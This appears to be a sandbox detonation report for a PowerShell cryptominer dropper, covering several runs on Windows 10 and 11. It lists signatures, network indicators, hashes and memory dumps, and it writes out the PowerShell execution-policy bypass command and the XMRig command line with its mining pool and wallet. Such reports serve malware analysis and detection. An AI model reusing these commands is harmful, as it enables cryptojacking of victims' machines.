powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.167.79.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp

Files

memory/2196-4-0x00007FFB65DB3000-0x00007FFB65DB4000-memory.dmp

memory/2196-5-0x0000022BE3CE0000-0x0000022BE3D02000-memory.dmp

memory/2196-8-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp

memory/2196-9-0x0000022BE3F90000-0x0000022BE4006000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a0cvzhm1.5s3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2196-10-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp

memory/2196-25-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp

memory/2196-29-0x00007FFB65DB3000-0x00007FFB65DB4000-memory.dmp

memory/2196-30-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp

memory/2196-31-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp

memory/2196-51-0x0000022BE4110000-0x0000022BE4122000-memory.dmp

memory/2196-64-0x0000022BE3F70000-0x0000022BE3F7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4596-93-0x000001C768B20000-0x000001C768B40000-memory.dmp

memory/4596-94-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-95-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-96-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-97-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-98-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-99-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-100-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-101-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-102-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-103-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-104-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-105-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-106-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-107-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-108-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-109-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-110-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-111-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-112-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-113-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-114-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-115-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-116-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-117-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-118-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-119-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-120-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-121-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-122-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-123-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-124-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-125-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-126-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-127-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-128-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-129-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-130-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-131-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-132-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-133-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-134-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-135-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-136-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-137-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-138-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-139-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-140-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-141-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-142-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-143-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-144-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-145-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-146-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-147-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-148-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-149-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-150-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-151-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-152-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-153-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-154-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-155-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

memory/4596-156-0x00007FF6FA700000-0x00007FF6FB333000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win10-20240611-en

Max time kernel

1796s

Max time network

1805s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

memory/4696-0-0x00007FFCA9A13000-0x00007FFCA9A14000-memory.dmp

memory/4696-5-0x000001CDF0D90000-0x000001CDF0DB2000-memory.dmp

memory/4696-8-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

memory/4696-9-0x000001CDF0EC0000-0x000001CDF0F36000-memory.dmp

memory/4696-10-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kbywh0hm.c5q.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4696-25-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

memory/4696-29-0x00007FFCA9A13000-0x00007FFCA9A14000-memory.dmp

memory/4696-30-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

memory/4696-38-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

memory/4696-51-0x000001CDF0D10000-0x000001CDF0D22000-memory.dmp

memory/4696-64-0x000001CDF0D00000-0x000001CDF0D0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4128-93-0x0000029051B60000-0x0000029051B80000-memory.dmp

memory/4696-94-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

memory/4128-95-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-96-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-97-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-98-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-99-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-100-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-101-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-102-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-103-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-104-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-105-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-106-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-107-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-108-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-109-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-110-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-111-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-112-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-113-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-114-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-115-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-116-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-117-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-118-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-119-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-120-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-121-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-122-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-123-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-124-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-125-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-126-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-127-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-128-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-129-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-130-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-131-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-132-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-133-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-134-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-135-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-136-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-137-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-138-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-139-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-140-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-141-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-142-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-143-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-144-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-145-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-146-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-147-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-148-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-149-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-150-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-151-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-152-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-153-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-154-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-155-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-156-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-157-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:56

Platform

win11-20240419-en

Max time kernel

1791s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/2936-0-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp

memory/2936-6-0x00000159A9E40000-0x00000159A9E62000-memory.dmp

memory/2936-7-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f3ivpgaw.mkj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2936-11-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2936-12-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2936-14-0x00000159AA240000-0x00000159AA252000-memory.dmp

memory/2936-15-0x00000159AA230000-0x00000159AA23A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2292-46-0x0000027876AD0000-0x0000027876AF0000-memory.dmp

memory/2292-47-0x0000027876D20000-0x0000027876D40000-memory.dmp

memory/2292-48-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2936-49-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp

memory/2936-50-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2292-53-0x0000027878510000-0x0000027878530000-memory.dmp

memory/2292-52-0x0000027876D40000-0x0000027876D60000-memory.dmp

memory/2292-51-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2936-54-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2292-55-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-56-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-58-0x0000027878510000-0x0000027878530000-memory.dmp

memory/2292-57-0x0000027876D40000-0x0000027876D60000-memory.dmp

memory/2292-59-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-60-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-61-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-62-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-63-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-64-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-65-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-66-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-67-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-68-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-69-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-70-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-71-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-72-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-73-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-74-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-75-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-76-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-77-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-78-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-79-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-80-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-81-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-82-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-83-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-84-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-85-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-86-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-87-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-88-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-89-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-90-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-91-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-92-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-93-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-94-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-95-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-96-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-97-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-98-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-99-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-100-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-101-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-102-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-103-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-104-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-105-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-106-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-107-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-108-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-109-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

